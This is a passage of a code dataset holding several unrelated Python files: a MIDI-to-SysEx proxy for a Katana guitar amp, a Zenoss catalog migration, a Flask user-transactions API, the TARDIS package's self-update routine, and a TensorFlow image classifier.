\"boost_color\": 0,\n \"mod_color\": 0,\n \"fx_color\": 0,\n \"delay_color\": 0,\n \"reverb_color\": 0,\n \"global_eq_color\": 0,\n\n # setting toggles: 0 == off, 1 == on\n \"reverb_on\": 0,\n \"delay2_on\": 0,\n \"pedal_fx_on\": 0,\n \"preamp_solo_on\": 0,\n\n \"bank\": 0, # toggles btn 0 and 127\n \"patch_selected\": 1, # from 1-8\n\n \"delay1_tap\": 0, # becomes a timestamp (ms since epoch)\n \"delay2_tap\": 0,\n }\n\ndef next_color(ev, attr_name):\n \"\"\"\n Switches the specified effect to the next color in the cycle.\n \"\"\"\n # determine the next color and set for next time\n color = amp_state[attr_name]\n if color >= 2:\n color = 0\n else:\n color = color + 1\n amp_state[attr_name] = color\n\n # send the command\n sysex_cmd = sysex_cmds[attr_name][color]\n return event.SysExEvent(ev.port, sysex_cmd)\n\ndef toggle_effect(ev, effect):\n \"\"\"\n Toggles the specified trait on (value 127) or off (value 0).\n \"\"\"\n key = ev.value\n # 0-63 == off, 64-127 == on\n if key <= 63:\n key = 0\n else:\n key = 1\n sysex_cmd = sysex_cmds[effect][key]\n return event.SysExEvent(ev.port, sysex_cmd)\n\ndef select_amp_sysex(patch):\n \"\"\"\n Returns the sysex cmd for selecting the specified patch.\n \"\"\"\n checksum = get_checksum(\n (0, 1, 0, 0, 0, patch))\n return sysex_cmds[\"select_amp\"].format(\n '{:02x}'.format(patch), '{:02x}'.format(checksum)\n )\n\ndef select_amp(ev):\n \"\"\"\n We accept program change (PC) values 1-4. 
If the `bank` value is 0 we use\n the first bank, if >0 we use the second one.\n \"\"\"\n patch = ev.program\n if not 1 <= patch <= 4:\n # expect PC 1-4\n return\n if amp_state[\"bank\"] > 0:\n # upper bank is 5-8\n patch = patch + 4\n amp_state[\"patch_selected\"] = patch\n sysex_cmd = select_amp_sysex(patch)\n return event.SysExEvent(ev.port, sysex_cmd)\n return ev\n\ndef toggle_amp_bank(ev):\n \"\"\"\n Toggles btn the two banks of four amps.\n \"\"\"\n if ev.value == amp_state[\"bank\"]:\n # we're already in the selected bank, do nothing\n return\n\n # get current patch and adjust it to match the new bank\n patch = amp_state[\"patch_selected\"]\n if ev.value == 0:\n patch = patch - 4\n else:\n patch = patch + 4\n\n # update our state trackng w the new values\n amp_state[\"bank\"] = ev.value\n amp_state[\"patch_selected\"] = patch\n\n # emit sysex event to switch to the corresponding amp in the other bank\n return event.SysExEvent(ev.port, select_amp_sysex(patch))\n\ndef delay_tap(ev, tap_str):\n \"\"\"\n Set delay interval by tapping. `tap_str` should be the sysex key,\n `delay1_tap` or `delay2_tap`.\n \"\"\"\n # now in whole milliseconds\n now = int(time.time() * 1000)\n\n # always store the new tap time\n last_tap = amp_state[tap_str]\n amp_state[tap_str] = now\n interval = now - last_tap\n\n # if first tap or > 2s since last tap, do nothing else\n if interval > 2000:\n return\n\n # get 11 digit binary representation\n interval_bin = bin(interval)[2:].zfill(11)\n\n # first four digits are the first hex number\n first_hex = int(interval_bin[:4], 2)\n # last 7 digits w a prepended zero is the second hex number\n second_hex = int('0'+interval_bin[4:], 2)\n\n if tap_str == \"delay1_tap\":\n code = 2 # delay1's opcode is 0x02\n else:\n code = 34 # delay2's opcode is 0x22\n\n checksum = get_checksum((96, 0, 5, code, first_hex, second_hex))\n\n # turn them into 2 digit strings\n first_hex = '0' + hex(first_hex)[2:] # always a single digit\n second_hex = hex(second_hex)[2:].zfill(2) # might be one or two digits\n checksum = hex(checksum)[2:].zfill(2)\n\n sysex_cmd = sysex_cmds[tap_str].format(\n first_hex, second_hex, checksum)\n return event.SysExEvent(ev.port, sysex_cmd)\n\ndef get_checksum(values):\n accum = 0\n for val in values:\n accum = (accum + val) & 127\n return (128-accum) & 127\n\n\ndef process_query_result(ev):\n \"\"\"\n Process SysEx data coming from the Katana.\n \"\"\"\n hex_bytes = ' '.join('{:02x}'.format(x) for x in ev.sysex)\n # print(\"SysEx event rec'd: {}\".format(hex_bytes))\n\n # extract the starting address and an unknown number of data bytes\n start_address = hex_bytes[24:35]\n data_bytes = hex_bytes[36:-6].split()\n\n address = None\n address_int = None\n last_addr_byte = None\n\n # iterate through the bytes and check each address\n for data_byte in data_bytes:\n if not address:\n # initialize\n address = start_address\n last_addr_byte = address[-2:]\n else:\n # increment hex str representation.\n if last_addr_byte != \"7f\":\n # increment the last byte by 1\n last_addr_byte = format(int(last_addr_byte,16)+1, '02x')\n address = \"{}{}\".format(address[:-2], last_addr_byte)\n else:\n # rolls over, need to increment the upper address byte\n last_addr_byte = \"00\"\n upper_addr_byte = address[-5:-3]\n upper_addr_byte = format(int(upper_addr_byte,16)+1, '02x')\n address = \"{}{} {}\".format(\n address[:-5], upper_addr_byte, last_addr_byte)\n\n # see if this byte matches a known setting address\n setting_name = addresses.get(address)\n if not setting_name:\n # no 
match, ignore it\n continue\n\n # update amp state\n if setting_name.endswith(\"color\") or setting_name.endswith(\"on\"):\n # print(\"Match: \" + setting_name)\n amp_state[setting_name] = int(data_byte)\n elif setting_name == \"patch_selected\":\n # print(\"Match: patch_selected\")\n patch = int(data_bytes[-1], 16)\n amp_state[\"patch_selected\"] = patch\n if patch <= 4:\n amp_state[\"bank\"] = 0\n else:\n amp_state[\"bank\"] = 127\n\ndef init():\n \"\"\"\n Send SysEx command queries to initialize our state.\n \"\"\"\n time.sleep(2) # wait for the engine to initialize\n ports = engine.out_ports()\n port = ports[0]\n cmds = [\n PREFIX + \" 12 7f 00 00 01 01 7f f7\", # put into verbose mode\n PREFIX + \" 11 00 01 00 00 00 00 00 02 7d f7\", # get patch number\n PREFIX + \" 11 60 00 06 39 00 00 00 05 5c f7\", # get effect colors\n PREFIX + \" 11 00 00 00 2e 00 00 00 01 51 f7\", # get global eq color\n ]\n for cmd in cmds:\n engine.output_event(\n event.SysExEvent(\n port, cmd)\n )\n\nstart_new_thread(init, ())\n\nrun(\n # CC messages for various toggles, option cycling, and delay taps\n [Filter(CTRL) >> CtrlSplit({\n 20: Process(toggle_effect, \"reverb_on\"),\n 21: Process(toggle_effect, \"delay2_on\"),\n 22: Process(toggle_effect, \"pedal_fx_on\"),\n 23: Process(toggle_amp_bank),\n\n 96: CtrlValueFilter(127) >> Process(next_color, \"boost_color\"),\n 97: CtrlValueFilter(127) >> Process(next_color, \"mod_color\"),\n 98: CtrlValueFilter(127) >> Process(next_color, \"fx_color\"),\n 99: CtrlValueFilter(127) >> Process(delay_tap, \"delay1_tap\"),\n 100: CtrlValueFilter(127) >> Process(next_color, \"reverb_color\"),\n 101: CtrlValueFilter(127) >> Process(delay_tap, \"delay2_tap\"),\n\n 102: Process(toggle_effect, \"preamp_solo_on\"),\n\n 103: CtrlValueFilter(127) >> Process(next_color, \"global_eq_color\"),\n\n None: Pass(),\n }),\n ProgramFilter([1, 2, 3, 4]) >> Process(select_amp),\n # SysEx messages are query results back from the amp\n SysExFilter(manufacturer=0x41) >> Call(process_query_result),\n SysExFilter(\"\\xf0\\x7e\") >> Call(process_query_result),\n ]\n )\n","repo_name":"rafrombrc/katana_midi_proxy","sub_path":"katana_midi_proxy.py","file_name":"katana_midi_proxy.py","file_ext":"py","file_size_in_byte":10763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17615385953","text":"__doc__='''\n\nClean up the maintenance window catalog after moving to notification\nsubscriptions.\n\n'''\nimport Migrate\n\nclass MigrateWindowCatalog(Migrate.Step):\n version = Migrate.Version(4, 0, 1)\n\n def cutover(self, dmd):\n catalog = dmd.maintenanceWindowSearch\n paths = set()\n for b in catalog():\n path = b.getPath()\n if path.startswith('/zport/dmd/ZenUsers'):\n paths.add(path)\n for path in paths:\n catalog.uncatalog_object(path)\n\nMigrateWindowCatalog()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/migrate/migrateWindowCatalog.py","file_name":"migrateWindowCatalog.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"72641127874","text":"import functools\nfrom decimal import Decimal\n\nfrom flask import Blueprint, request, jsonify, g\nfrom mongoengine import DoesNotExist, MultipleObjectsReturned\n\nfrom utair.models import User, Transaction\n\nimport dateutil.parser\n\nfrom utair.utils import json_ok, json_error\n\nbp = Blueprint('user', __name__, url_prefix='/user')\n\nPAGE_SIZE = 10\n\n\ndef token_required(view):\n 
\"\"\"Decorator that check for user token is GET arguments.\"\"\"\n\n @functools.wraps(view)\n def wrapped(**kwargs):\n token = None\n\n if request.method == 'GET':\n token = request.args.get('token')\n elif request.method == 'POST':\n if 'token' in request.form:\n token = request.form['token']\n\n if token is None:\n return json_error('Token not found in request')\n\n return view(**kwargs)\n\n return wrapped\n\n\ndef load_user_by_token(view):\n \"\"\"Decorator that load user object from the database\n in to ``g.user`` by token.\"\"\"\n\n @functools.wraps(view)\n def wrapped(**kwargs):\n token = request.args.get('token')\n\n try:\n user = User.objects(token=token).get()\n except DoesNotExist:\n return json_error('User not found')\n except MultipleObjectsReturned as e:\n # Shouldn't be possible, because token is unique\n raise e\n\n g.user = user\n\n return view(**kwargs)\n\n return wrapped\n\n\n@bp.route('/info', methods=['GET'])\n@load_user_by_token\n@token_required\ndef user_info():\n user = g.user\n\n total_bonus = Transaction.objects(card_id=user.card_id).sum('bonus')\n\n return json_ok({\n 'user': {\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'patronymic': user.patronymic,\n 'email': user.email,\n 'card_id': user.card_id,\n 'total_bonus': total_bonus\n }\n })\n\n\ndef add_param(params, arg, key=None, type=None, converter=None):\n \"\"\"Adds parameter to params map.\n Supports: custom key\n custom type\n converting param before assignment\"\"\"\n if key is None:\n key = arg\n if type is None:\n type = str\n\n param = request.args.get(arg, type=type)\n\n if param is not None:\n if converter is None:\n params[key] = param\n else:\n params[key] = converter(param)\n\n\n@bp.route('/transactions', methods=['GET'])\n@load_user_by_token\n@token_required\ndef user_transactions():\n \"\"\"Lets user see his transactions, supports:\n pagination (page param)\n filtering: from (place)\n to (place)\n before (date)\n after (date)\n transaction_ids\n less (bonus)\n more (bonus)\"\"\"\n card_id = g.user.card_id\n\n page = request.args.get('page', default=1, type=int)\n # page is number from 1 to ...\n page = max(1, page)\n\n params = {'card_id': card_id}\n\n add_param(params, 'from', 'from_place')\n\n add_param(params, 'to', 'to_place')\n\n # must treat this differently, because its list (always not None)\n transaction_ids = request.args.getlist('id', type=int)\n\n if len(transaction_ids) > 0:\n params['transaction_id__in'] = transaction_ids\n\n add_param(params, 'before', 'date__lte', converter=dateutil.parser.parse)\n\n add_param(params, 'after', 'date__gte', converter=dateutil.parser.parse)\n\n # bonus more than\n add_param(params, 'more', 'bonus__gte', type=Decimal)\n\n # bonus less than\n add_param(params, 'less', 'bonus__lte', type=Decimal)\n\n transactions = Transaction.objects(**params).paginate(page=page, per_page=PAGE_SIZE)\n\n # list of jsoninied transactions\n trans_json = []\n\n for transaction in transactions.items:\n trans_json.append({\n 'transaction_id': transaction.transaction_id,\n 'card_id': transaction.card_id,\n 'bonus': float(transaction.bonus),\n 'from': transaction.from_place,\n 'to': transaction.to_place,\n 'date': transaction.date\n })\n\n return json_ok({'transactions': trans_json})\n","repo_name":"Kolaer/utair","sub_path":"utair/blueprints/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10335858592","text":"import 
json\nimport numpy as np\nimport os\nimport struct\nfrom array import array as pyarray\nimport pickle\n\ndef load_synth_data(dataset_name, base_folder='data'):\n \"\"\"\n This function loads the synthesized data provided in a picke file in the\n /data directory.\n \"\"\"\n\n data_path = os.path.join(base_folder, dataset_name)\n\n with open(data_path, 'rb') as handle:\n data = pickle.load(handle)\n\n trainX = data['trainX']\n trainY = data['trainY']\n\n return trainX, trainY\n\n\ndef load_mnist_data(threshold, fraction=1.0, examples_per_class=500, mnist_folder='data'):\n \"\"\"\n Loads a subset of the MNIST dataset.\n\n Arguments:\n threshold - (int) One greater than the maximum digit in the selected\n subset. For example to get digits [0, 1, 2] this arg should be 3, or\n to get the digits [0, 1, 2, 3, 4, 5, 6] this arg should be 7.\n fraction - (float) Value between 0.0 and 1.0 representing the fraction\n of data to include in the training set. The remaining data is\n included in the test set. Unused if dataset == 'synthetic'.\n examples_per_class - (int) Number of examples to retrieve in each\n class.\n mnist_folder - (string) Path to folder containing MNIST binary files.\n\n Returns:\n train_features - (np.array) An Nxd array of features, where N is the\n number of examples and d is the number of features.\n test_features - (np.array) An Nxd array of features, where M is the\n number of examples and d is the number of features.\n train_targets - (np.array) A 1D array of targets of size N.\n test_targets - (np.array) A 1D array of targets of size M.\n \"\"\"\n assert 0.0 <= fraction <= 1.0, 'Whoopsies! Incorrect value for fraction :P'\n\n train_examples = int(examples_per_class * fraction)\n if train_examples == 0:\n train_features, train_targets = np.array([[]]), np.array([])\n else:\n train_features, train_targets = _load_mnist(\n dataset='training', digits=range(threshold), path=mnist_folder)\n train_features, train_targets = stratified_subset(\n train_features, train_targets, train_examples)\n train_features = train_features.reshape((len(train_features), -1))\n\n test_examples = examples_per_class - train_examples\n if test_examples == 0:\n test_features, test_targets = np.array([[]]), np.array([])\n else:\n test_features, test_targets = _load_mnist(\n dataset='testing', digits=range(threshold), path=mnist_folder)\n test_features, test_targets = stratified_subset(\n test_features, test_targets, test_examples)\n test_features = test_features.reshape((len(test_features), -1))\n\n return train_features, test_features, train_targets, test_targets\n\n\ndef _load_mnist(path, dataset=\"training\", digits=None, asbytes=False,\n selection=None, return_labels=True, return_indices=False):\n \"\"\"\n Loads MNIST files into a 3D numpy array. Does not automatically download\n the dataset. You must download the dataset manually. The data can be\n downloaded from http://yann.lecun.com/exdb/mnist/.\n\n Examples:\n 1) Assuming that you have downloaded the MNIST database in a directory\n called 'data', this will load all images and labels from the training\n set:\n\n images, labels = _load_mnist('training')\n\n 2) And this will load 100 sevens from the test partition:\n\n sevens = _load_mnist('testing', digits=[7], selection=slice(0, 100),\n return_labels=False)\n\n Arguments:\n path - (str) Path to your MNIST datafiles.\n dataset - (str) Either \"training\" or \"testing\". The data partition to\n load.\n digits - (list or None) A list of integers specifying the digits to\n load. 
If None, the entire database is loaded.\n asbytes - (bool) If True, returns data as ``numpy.uint8`` in [0, 255]\n as opposed to ``numpy.float64`` in [0.0, 1.0].\n selection - (slice) Using a `slice` object, specify what subset of the\n dataset to load. An example is ``slice(0, 20, 2)``, which would\n load every other digit until--but not including--the twentieth.\n return_labels - (bool) Specify whether or not labels should be\n returned. This is also a speed performance if digits are not\n specified, since then the labels file does not need to be read at\n all.\n return_indicies - (bool) Specify whether or not to return the MNIST\n indices that were fetched. This is valuable only if digits is\n specified, because in that case it can be valuable to know how far\n in the database it reached.\n Returns:\n images - (np.array) Image data of shape ``(N, rows, cols)``, where\n ``N`` is the number of images. If neither labels nor indices are\n returned, then this is returned directly, and not inside a 1-sized\n tuple.\n labels - (np.array) Array of size ``N`` describing the labels.\n Returned only if ``return_labels`` is `True`, which is default.\n indices - (np.array) The indices in the database that were returned.\n \"\"\"\n\n # The files are assumed to have these names and should be found in 'path'\n files = {\n 'training': ('train-images-idx3-ubyte', 'train-labels-idx1-ubyte'),\n 'testing': ('t10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte'),\n }\n\n try:\n images_fname = os.path.join(path, files[dataset][0])\n labels_fname = os.path.join(path, files[dataset][1])\n except KeyError:\n raise ValueError(\"Data set must be 'testing' or 'training'\")\n\n # We can skip the labels file only if digits aren't specified and labels\n # aren't asked for\n if return_labels or digits is not None:\n flbl = open(labels_fname, 'rb')\n magic_nr, size = struct.unpack(\">II\", flbl.read(8))\n labels_raw = pyarray(\"b\", flbl.read())\n flbl.close()\n\n fimg = open(images_fname, 'rb')\n magic_nr, size, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n images_raw = pyarray(\"B\", fimg.read())\n fimg.close()\n\n if digits:\n indices = [k for k in range(size) if labels_raw[k] in digits]\n else:\n indices = range(size)\n\n if selection:\n indices = indices[selection]\n\n images = np.zeros((len(indices), rows, cols), dtype=np.uint8)\n\n if return_labels:\n labels = np.zeros((len(indices)), dtype=np.int8)\n for i in range(len(indices)):\n images[i] = np.array(images_raw[indices[i] * rows * cols:(indices[i] + 1) * rows * cols]).reshape((rows, cols))\n if return_labels:\n labels[i] = labels_raw[indices[i]]\n\n if not asbytes:\n images = images.astype(float)/255.0\n\n ret = (images,)\n if return_labels:\n ret += (labels,)\n if return_indices:\n ret += (indices,)\n\n if len(ret) == 1:\n return ret[0] # Don't return a tuple of one\n\n return ret\n\n\ndef stratified_subset(features, targets, examples_per_class):\n \"\"\"\n Evenly sample the dataset across unique classes. 
def stratified_subset(features, targets, examples_per_class):\n    \"\"\"\n    Evenly sample the dataset across unique classes. Requires each unique class\n    to have at least examples_per_class examples.\n\n    Arguments:\n        features - (np.array) An Nxd array of features, where N is the\n            number of examples and d is the number of features.\n        targets - (np.array) A 1D array of targets of size N.\n        examples_per_class - (int) The number of examples to take in each\n            unique class.\n    Returns:\n        features - (np.array) An N'xd array of features containing at most\n            examples_per_class examples per unique class.\n        targets - (np.array) The corresponding 1D array of targets of size N'.\n    \"\"\"\n    idxs = np.array([False] * len(features))\n    for target in np.unique(targets):\n        idxs[np.where(targets == target)[0][:examples_per_class]] = True\n    return features[idxs], targets[idxs]\n","repo_name":"jagilley/skl-reimplementation","sub_path":"neural-networks/data/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71313379393","text":"#######################################################################\n#  TARDIS - Transformer And Rapid Dimensionless Instance Segmentation #\n#                                                                     #\n#                      New York Structural Biology Center            #\n#                         Simons Machine Learning Center             #\n#                                                                     #\n#                         Robert Kiewisz, Tristan Bepler             #\n#                         MIT License 2021 - 2023                    #\n#######################################################################\n\nimport json\nfrom os import mkdir\nfrom os.path import expanduser, join, isdir, isfile\nimport subprocess\nimport requests\nfrom tardis_em.utils.logo import TardisLogo\n\nfrom tardis_em.utils.aws import aws_check_pkg_with_temp\nimport sys\nimport time\n\n\ndef ota_update(status=False):\n    if not isdir(join(expanduser(\"~\"), \".tardis_em\")):\n        mkdir(join(expanduser(\"~\"), \".tardis_em\"))\n\n    timestamp = time.time()\n    if isfile(\n        join(\n            expanduser(\"~\"),\n            \".tardis_em\",\n            \"last_check.json\",\n        )\n    ):\n        try:\n            save = json.load(\n                open(\n                    join(\n                        expanduser(\"~\"),\n                        \".tardis_em\",\n                        \"last_check.json\",\n                    )\n                )\n            )[\"timestamp\"]\n        except Exception:\n            save = time.time()\n            with open(\n                join(join(expanduser(\"~\"), \".tardis_em\"), \"last_check.json\"), \"w\"\n            ) as f:\n                json.dump({\"timestamp\": timestamp}, f)\n\n        if timestamp - save > 86400:\n            # Check OTA-Update\n            ota_status = aws_check_pkg_with_temp()\n        else:\n            ota_status = True\n    else:\n        # Check OTA-Update\n        ota_status = aws_check_pkg_with_temp()\n\n    if status:\n        if not ota_status:\n            return \"New version is available\"\n        else:\n            return \"\"\n    else:\n        if not ota_status:\n            main_logo = TardisLogo()\n            main_logo(\n                title=\"| Transforms And Rapid Dimensionless Instance Segmentation\",\n                text_0=\"TARDIS_pytorch has a new update available via OTA-Update!\",\n                text_1=\"Please run this command to update tardis\",\n                text_3=\"tardis_ota\",\n                text_5=\"Contact developers if segmentation of your organelle is not supported!\",\n                text_6=\"rkiewisz@nysbc.org | tbepler@nysbc.org\",\n                text_8=\"Join Slack community: https://tardis-em.slack.com\",\n            )\n            time.sleep(10)\n            with open(\n                join(join(expanduser(\"~\"), \".tardis_em\"), \"last_check.json\"), \"w\"\n            ) as f:\n                json.dump({\"timestamp\": timestamp}, f)\n
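`ota_update` above throttles the AWS package check to at most once per day by caching a timestamp in `~/.tardis_em/last_check.json`. The same pattern in isolation (the cache path and the check itself are stand-ins for the demo):

```python
# Run an expensive check at most once per max_age_s seconds.
import json
import os
import time

CACHE = os.path.expanduser("~/.demo_last_check.json")  # illustrative path

def should_check(max_age_s=86400):
    try:
        with open(CACHE) as f:
            last = json.load(f)["timestamp"]
    except (OSError, KeyError, ValueError):
        last = 0.0  # missing or corrupt cache: treat as stale
    if time.time() - last > max_age_s:
        with open(CACHE, "w") as f:
            json.dump({"timestamp": time.time()}, f)
        return True
    return False

print(should_check())  # True on the first call, False for the next 24 hours
```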
\"https://tardis-weigths.s3.dualstack.us-east-1.amazonaws.com/\"\n            \"tardis_em/tardis_em-x.x.x-py3-none-any.whl\",\n            timeout=(5, None),\n        )\n    except Exception:\n        return \"OTA-Up-to-Date\"\n\n    # Save OTA-Update\n    with open(\n        join(expanduser(\"~\"), \".tardis_em/tardis_em-x.x.x-py3-none-any.whl\"),\n        \"wb\",\n    ) as f:\n        f.write(py_pkg.content)\n\n    with open(join(expanduser(\"~\"), \".tardis_em/pkg_header.json\"), \"w\") as f:\n        json.dump(dict(py_pkg.headers), f)\n\n    # Before installing, uninstall old package versions\n    # Make sure to remove legacy files\n    try:\n        subprocess.run([\"pip\", \"uninstall\", \"-y\", \"tardis-pytorch\"])\n    except Exception:\n        pass\n\n    subprocess.run([\"pip\", \"uninstall\", \"-y\", \"tardis_em\"])\n\n    subprocess.run(\n        [\n            \"pip\",\n            \"install\",\n            join(\n                expanduser(\"~\"),\n                \".tardis_em/\" \"tardis_em-x.x.x-py3-none-any.whl\",\n            ),\n        ]\n    )\n\n    main_logo = TardisLogo()\n    main_logo(\n        title=\"| Transforms And Rapid Dimensionless Instance Segmentation\",\n        text_0=\"TARDIS_pytorch was updated via OTA-Update!\",\n        text_1=\"Please restart your previous operation.\",\n        text_3=\"(rkiewisz@nysbc.org | tbepler@nysbc.org).\",\n        text_4=\"Join Slack community: https://tardis-em.slack.com\",\n        text_6=\"FUNCTIONALITY:\",\n        text_7=\"To predict microtubule and filament instances:\",\n        text_8=\"  tardis_mt --help\",\n        text_10=\"To predict membrane semantic and instances:\",\n        text_11=\"  tardis_mem --help |OR| tardis_mem2d --help\",\n    )\n    sys.exit()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"SMLC-NYSBC/TARDIS","sub_path":"tardis_em/utils/ota_update.py","file_name":"ota_update.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11752076215","text":"import tensorflow as tf\nfrom skimage import transform\nfrom skimage import data\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nfrom skimage.color import rgb2gray\nimport random\nimport pandas as pd\n\n\ndef load_data(data_dir):\n    # Get all subdirectories of data_dir. 
Each represents a label.\n directories = [d for d in os.listdir(data_dir)\n if os.path.isdir(os.path.join(data_dir, d))]\n # Loop through the label directories and collect the data in\n # two lists, labels and images.\n labels = []\n images = []\n for d in directories:\n label_dir = os.path.join(data_dir, d)\n file_names = [os.path.join(label_dir, f)\n for f in os.listdir(label_dir)\n if f.endswith(\".jpg\")]\n for f in file_names:\n images.append(data.imread(f))\n labels.append(int(d))\n return images, labels\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer('num_classes', 3, 'Number of classes.')\nflags.DEFINE_integer('num_variables', 784, 'Number of variables.')\n\n# Hyper Parameters\nflags.DEFINE_integer('hidden1', 256, 'Number of units in hidden layer 1.')\nflags.DEFINE_integer('hidden2', 128, 'Number of units in hidden layer 2.')\nflags.DEFINE_integer('num_epochs', 50, 'Number of learning epochs.')\nflags.DEFINE_integer('batch_size', 10, 'Batch size.')\nflags.DEFINE_float('keep_prob', 0.5, 'Keep probability for drop out.')\nflags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')\n\ndef inference(data, data_size, keep_prob):\n # # Hidden layer 1\n # with tf.name_scope('hidden1'):\n # weights = tf.Variable(tf.truncated_normal([data_size, FLAGS.hidden1],\n # stddev=1.0 / math.sqrt(float(data_size))), name='weights1')\n # biases = tf.Variable(tf.zeros([FLAGS.hidden1]), name='biases1')\n # hidden1 = tf.nn.relu(tf.matmul(data, weights) + biases)\n #\n # # Dropout before layer 2\n # hidden1_drop = tf.nn.dropout(hidden1, keep_prob, name='layer1_dropout')\n #\n # # Hidden layer 2\n # with tf.name_scope('hidden2'):\n # weights = tf.Variable(tf.truncated_normal([FLAGS.hidden1, FLAGS.hidden2],\n # stddev=1.0 / math.sqrt(float(FLAGS.hidden1))), name='weights2')\n # biases = tf.Variable(tf.zeros([FLAGS.hidden2]), name='biases2')\n # hidden2 = tf.nn.sigmoid(tf.matmul(hidden1_drop, weights) + biases)\n #\n # # Dropout before linear reading out\n # hidden2_drop = tf.nn.dropout(hidden2, keep_prob, name='layer2_dropout')\n #\n # # Read out\n # with tf.name_scope('softmax_linear'):\n # weights = tf.Variable(tf.truncated_normal([FLAGS.hidden2, FLAGS.num_classes],\n # stddev=1.0 / math.sqrt(float(FLAGS.hidden2))), name='weights')\n # biases = tf.Variable(tf.zeros([FLAGS.num_classes]), name='biases')\n # logits = tf.matmul(hidden2_drop, weights) + biases\n\n weights = tf.Variable(tf.zeros([data_size, FLAGS.num_classes]), name='weights')\n biases = tf.Variable(tf.zeros([FLAGS.num_classes]), name='biases')\n logits = tf.matmul(data, weights) + biases\n\n return logits\n\ndef loss(logits, labels):\n labels = tf.to_int64(labels)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels, name='xentropy')\n vars = tf.trainable_variables()\n reg = tf.add_n([tf.nn.l2_loss(v) for v in vars])*0.01\n# reg = 0.01*(tf.nn.l2_loss(w) + tf.nn.l2_loss(b))\n loss = tf.reduce_mean(cross_entropy, name='xentropy_mean') + reg\n return loss\n\ndef training(loss):\n tf.summary.scalar(loss.op.name, loss)\n optimizer = tf.train.AdamOptimizer(FLAGS.learning_rate)\n global_step = tf.Variable(0, name='global_step', trainable=False)\n train_op = optimizer.minimize(loss, global_step=global_step)\n return train_op\n\ndef evaluation(logits, labels):\n correct = tf.nn.in_top_k(logits, labels, 1)\n return tf.reduce_sum(tf.cast(correct, tf.int32))\n\ndef shuffle_data(data, labels):\n # transform list into DataFrame\n new_df = pd.DataFrame(data)\n new_df['__labels__'] = 
labels\n new_df = new_df.reindex(np.random.permutation(new_df.index))\n\n new_labels = list(new_df['__labels__'])\n del new_df['__labels__']\n\n # transform DataFrame into list\n new_row = []\n for index, row in new_df.iterrows():\n _list_row = []\n for col in new_df:\n _list_row.append(row[col])\n new_row.append(_list_row)\n\n return new_row, new_labels\n\ndef run_training(data, labels):\n # Tell TensorFlow that the model will be built into the default Graph.\n with tf.Graph().as_default():\n data_size = FLAGS.num_variables\n num_classes = FLAGS.num_classes\n\n data_placeholder = tf.placeholder(\"float\", shape=(None, data_size))\n labels_placeholder = tf.placeholder(\"int32\", shape=None)\n keep_prob = tf.placeholder(\"float\")\n\n # Build a Graph that computes predictions from the inference model.\n logits = inference(data_placeholder, data_size, keep_prob)\n\n correct_pred = tf.argmax(logits, 1)\n\n # Add to the Graph the loss calculation.\n loss_op = loss(logits, labels_placeholder)\n\n # Add to the Graph operations that train the model.\n train_op = training(loss_op)\n\n # Add the Op to compare the logits to the labels during evaluation.\n eval_correct = evaluation(logits, labels_placeholder)\n\n # Build the summary Tensor based on the TF collection of Summaries.\n summary = tf.summary.merge_all()\n\n # The op for initializing the variables.\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n # check point\n saver = tf.train.Saver()\n\n # Create a session for running operations in the Graph.\n sess = tf.Session()\n\n # Instantiate a SummaryWriter to output summaries and the Graph.\n summary_writer = tf.summary.FileWriter('.', sess.graph)\n\n # Initialize the variables (the trained variables and the epoch counter).\n sess.run(init_op)\n\n # training\n for epoch in range(FLAGS.num_epochs):\n for i in range(int(len(data)/FLAGS.batch_size)):\n batch = FLAGS.batch_size*i\n sess.run(train_op, feed_dict={\n data_placeholder: data[batch:batch + FLAGS.batch_size],\n labels_placeholder: labels[batch:batch + FLAGS.batch_size],\n keep_prob: FLAGS.keep_prob})\n\n # calculate accuracy in every epoch\n actual_loss, train_accuracy = sess.run([loss_op, eval_correct], feed_dict={\n data_placeholder: data,\n labels_placeholder: labels,\n keep_prob: FLAGS.keep_prob})\n print(\"epoch %d, loss %g, acc %g\" % (epoch, actual_loss, train_accuracy / len(labels)))\n\n # update TensorBoard\n summary_str = sess.run(summary, feed_dict={\n data_placeholder: data,\n labels_placeholder: labels,\n keep_prob: 1.0})\n summary_writer.add_summary(summary_str, epoch)\n\n # shuffling data for next epoch\n data, labels = shuffle_data(data, labels)\n\n # Save a checkpoint and evaluate the model periodically.\n # Create a saver for writing training checkpoints.\n path = saver.save(sess, '/home/hguan/project/machine-learning/garage/models.ckpt')\n print('checkpoint is saved at ' + path)\n\n sess.close()\n\ndef run_classifier(data):\n with tf.Graph().as_default():\n data_size = FLAGS.num_variables\n num_classes = FLAGS.num_classes\n data_placeholder = tf.placeholder(\"float\", shape=(None, data_size))\n\n logits = inference(data_placeholder, data_size, 1.0)\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n sess = tf.Session()\n sess.run(init_op)\n\n saver = tf.train.Saver()\n saver.restore(sess, '/home/hguan/project/machine-learning/garage/models.ckpt')\n\n prediction_list = []\n total = len(data)\n with sess.as_default():\n for i in 
